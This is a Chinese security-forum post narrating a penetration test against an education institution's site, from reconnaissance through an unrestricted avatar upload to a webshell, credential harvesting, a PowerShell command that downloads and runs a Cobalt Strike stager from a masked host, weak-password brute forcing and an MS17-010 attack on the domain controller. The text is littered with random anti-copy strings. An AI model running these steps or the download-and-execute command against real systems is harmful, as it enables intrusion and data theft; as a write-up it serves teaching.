找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2217|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

8 h1 l9 V$ H+ _1 e* ^6 B* q) M 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路! y- ~8 k4 O, a9 i3 x, s& c& B

' j( ^ A4 B7 K4 R# V2 r, b4 P6 T

* O) Y# X2 L, _- [# o; Q   . l- j* d \, @' C/ ^% }

# B8 ^ K3 S* G. w* V* N$ H! o5 `

6 ~/ P, o# J: x e, X1 d0 }$ j 正文0 H/ a4 o2 U' y+ Z- G) p

& A4 X$ u+ {& ^& x

; u7 M% _5 c% s: P) [- [$ A' w   - G8 Z3 B. \2 p. c" W4 E! ?

# N* p$ G+ i: G/ q

3 U/ y7 q, K* r* L! q 目标:www.xxxx.com(一家教育机构)
# z7 _7 Z7 u% M) h
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
" M: k, I* N8 X5 g

" f2 u" B8 _( o3 A! k" Z( _: U

- j! V8 R: T7 w) D; v s7 j vshapes=. e3 c( r0 e8 j$ _( a

8 J$ Y& b; J. D) e4 H* T) f1 g

5 M3 @* j6 r+ p( Z! w 进行了简单的信息搜集
; Y% C. l0 N( e% V3 L) E2 e4 p- T
/ Z# c$ f7 [) q" \9 f
, I( l0 \0 X0 |6 G1 G( F

0 K! D& r# u. w! O

u3 t# F3 Y$ f. l- B8 r 子域名搜集 6 |1 h6 v% h! M! E/ X) l

5 e2 J, |5 [6 j& h

) N5 Q% E. _: B5 B3 | vshapes=; I' H# P4 U% ]" t0 H

4 x4 h" z' Y0 w$ O

6 H# s6 G) _9 C ] fofa找资产
- ?7 X+ n; V& T
$ K$ ]. ]6 N$ I. o. D, d7 k
4 |7 Y' q( T% d! @8 j

2 Q/ D/ w* H: c$ R$ c: {

# v8 i5 [2 o, e% v6 H) p vshapes= 3 O- |& E& Z" u( ?

, F# I$ Z# T, c7 F0 l* h8 p! T

7 w5 Z: ~# |3 J' ~ 一共七个资产。去重之后只有两个。
6 a5 P0 ] U& W8 l6 n
6 b- a5 y0 c$ Z0 l; Y
# U- B ^' U3 e7 D% j% o* `

' i4 l# Y& B' j& D$ {8 o0 M

- h) s2 J1 S/ f. }7 I 目录探测 + _7 u: _+ i+ L) K8 g$ P& ?" T

' D) x: }, s( m, o' v

" l0 n& }% X W vshapes=& ~+ O$ G" b% Q, x7 Y/ B

: X) y- f. u- ~6 N

' Z8 B5 C8 N3 e) b6 ^ d* S 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
% m2 H1 \0 `( O. @" ^. c
/ O1 T9 s" d5 S% B8 q2 E& R
1 A Y K! e$ f+ c, K% h; u; ^

( h& |- P2 ~6 ]8 @5 F, m5 q

/ X9 l+ C4 j; W. V& ^9 N 我又尝试了通过修改返回包来绕过登录界面 4 A1 L$ }+ S$ ?: Y" \* W

/ v' {" o9 a9 W

\7 c/ O* i! r5 U0 j) Y vshapes= 4 x* j8 S. t" r* u

Z: N0 P J8 F2 C: L

T; E3 U4 Y4 g1 C2 } 还是不行,尝试注入无果: Q7 q4 U$ ^* k" {: s. w

9 F! g9 _. S& X& o: \

) T$ v3 a! U9 k; @' b vshapes=% g1 k9 E# H7 X. s7 S1 t

8 o5 ?: Y; _5 l' I# r% {

5 T& M; X( [' D" I' y: }& w 不过我目录探测出了一处Spring信息泄露
, U; ~( H8 D2 q# f( {8 \
2 i, j k, x J b9 K2 _: Y
, z, u! a# @4 C, A

/ v3 G0 @5 K# `2 h7 O) E& G4 I

4 z4 Y' [3 o# n3 W vshapes= 6 b/ v6 y! ^" ^9 L

3 \# N8 r9 w4 m4 j: e3 q

8 W l6 G0 q' p8 d 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 + b# z0 `# b. @/ V

4 P( V; v6 t* d0 b. Q$ s7 t# E

5 }+ j% J) d/ i% m7 W# ]9 i/ u vshapes=! H' `5 z" D6 e$ u2 O& Z/ x0 }

: d0 x7 z1 G# _4 |

: S5 c. v, _0 Z+ s- w 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。) l% I6 S. y( {# d

- G5 w( I% F6 v W4 u! O

0 x. z; [7 A9 n# ^: A3 B vshapes= / n7 y, R4 L5 l, {2 y0 m' d' M

6 J0 H! t: E. l$ w4 V

. P0 d& Q+ g" k 获取有些师傅到这一步就手机抓包电脑测了。 ! N) N: h: T! P' M2 o

' L+ q6 n0 W6 k- R+ F

& [- W: G9 Y% m; r1 W& |7 n+ _ Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。( g) P' p: d& s

, R: [! N$ q8 b5 _/ w# U8 a, Z

$ { K$ ?: P: [) A 其中在一个公众号发现了小程序,可以进行注册。 m2 f8 Y9 w1 ~4 Q; T4 n

$ J. S8 o( {$ G! @6 J

/ J: Z- p8 T0 U$ ^ 看到了头像上传,尝试上传获取WebShell 5 h2 r2 n& f8 S& i6 M- Q# b! a$ o

* G% } Z4 N( \& i4 m" }# T) C

2 y8 h) s! I, p# ~6 M vshapes= $ m! C5 `' x: g# u

4 u% p2 [3 n5 K2 @, z9 ^9 g

$ Q' F; u5 ]2 s. b0 r$ a* P 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 ' c) D& k( d( o- [3 @/ Y

J2 d+ ~: ~ w# N0 _. K: n: ^

! f8 v( \0 ~6 o- m3 P: _; z7 m vshapes=: O- o) ~. b2 z0 L

0 i/ [( }! i x* Y o4 x8 |* p

5 @* [, f3 C; C/ J) U' v7 z7 | 然后上了大马9 F7 N6 k1 r! k! R6 E7 D

2 q- J: g- y/ h/ Z0 A P

! g% K. v* M& X6 i8 z vshapes=4 l% @! `; m7 E @( f2 r& m% g

2 K! p* i; g' p( `$ |

" k- S8 @, M) G% V! }% w* T! c* V vshapes= / n: c/ S i' \" o. ?6 U

2 Z9 M4 q ^6 z& ^

% i. F5 n/ r+ d 通过翻找文件发现数据库账号密码 : y0 E2 B) d8 m) R

0 F' P. l( W2 ~' m4 h

: N/ R+ B" L$ h. Y9 ?6 r7 z vshapes=; P+ o# ]: b- j: ]3 m0 a. x

2 E9 B( N( h( ]+ n& H3 s" U6 K' p

: m; Q& e- w* q --内网渗透 Z7 F8 |. f; }& F7 S5 b3 d

: f" k/ m. C: e7 r$ |: Y7 ]4 f

+ k3 W8 B% }0 A/ L 直接通过powershell执行 cs上线 . i1 }" H3 _- ]# O. S% N

* q. \9 D6 c* V* J2 g: |+ S

% v9 z, D3 Z" y( ^ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 1 M0 M6 P! q7 a7 s( ?

) i" l1 D8 O" [6 Z8 ^. j2 E

. X, Z2 |2 z( n2 X, Z7 o vshapes= % X/ h. f3 C) c+ O7 B

8 C8 v6 e) ^) y' T

1 ^5 ] J: s* B" k" a3 \ 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破' N+ Z w' t3 K: G& |9 ~3 r/ m

0 A* `* H9 B6 Q! {- N/ `- D

; s) a4 v1 Q. k2 ]- f0 w vshapes= 7 M( ^3 {$ X: k E8 o

9 y/ d! u2 ~" U7 B

, e. [: ?/ k" X! t! }; b 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
! X- z m8 B: A, \1 D) Q; M
! Z9 Z# u6 M" Z( O
, Y- f: J' u0 F) t" q
! z5 Z6 _% Q9 b* U

5 a$ ?( y4 s9 r" ^, @

7 R. u3 a" F! t% E0 ^" |9 R vshapes= 1 b. x( R B! C! C! a5 b1 z9 u

E# a. b. e x. j. K, E1 N& }

. d$ g' B2 d0 t6 S' U 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
, W% d9 {" l# f& f* v9 p
4 ]; F" F" l( y! V
( }" n" ~( y& E; l/ @- `

8 y C2 r# |; E4 ~

! J( A1 r* H- V. m2 R% M& R vshapes=- f" H' n8 F8 ]' J' p8 b4 t3 L

! X8 k9 p/ q4 s- C

6 D3 @; I. ^( c# d& ? E
. `1 A2 G5 E. U1 ]: u
- O9 x- F3 [9 P
# f* ~" ^" _9 L- Y9 [' e% j% s

# z3 v, [( Q2 w

4 }* g& Q: m% H' P8 a  6 J) i& Y j7 |- U

7 ], y- d- C0 |/ u& j7 x

- g6 p; M9 w! }$ o4 k) V) G, x- [ 小结 3 u! { _/ d" J" Q' i: w

4 l. a/ @4 G0 ?

* `- C. | }' F6 l$ r, ^   ) `* K6 a! p9 E$ ~& `

4 z p. e" Z' V. L

! B9 v; W" ?3 S! V+ X5 j) ? 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!8 W, K- h: d" Y

6 g7 [ K7 p- a7 x+ U/ i @+ F# C

2 B6 C$ a H6 |' I- D3 _( I   1 A2 q2 ] C: ?) K8 P% D. \

8 H" P) Y. v8 h' y: y8 C
    & M7 X9 U! I' U& c" e
  • - `" e! r Y0 o5 S( u$ ?9 R  % H. r+ e f- g' O* {% |" o
  • ; ?) |5 l5 D4 h
  • . c, m- c4 u; Q ~   9 m! n, J4 z0 b$ {" r( h
  • 1 _+ C9 X6 Y1 Q; A3 o/ h4 U
5 l! B/ d' G+ N4 J* {9 ^1 V

3 f" p8 M B) p6 Z+ D; e: ]0 M 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html & |* ~% h: I2 r0 v9 i, f' X

! j6 v7 [- s: {) L" U! v/ i r* y! E

k; `4 g# v/ d7 q- t1 E  / K% P: f# s) T* n" M% a

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表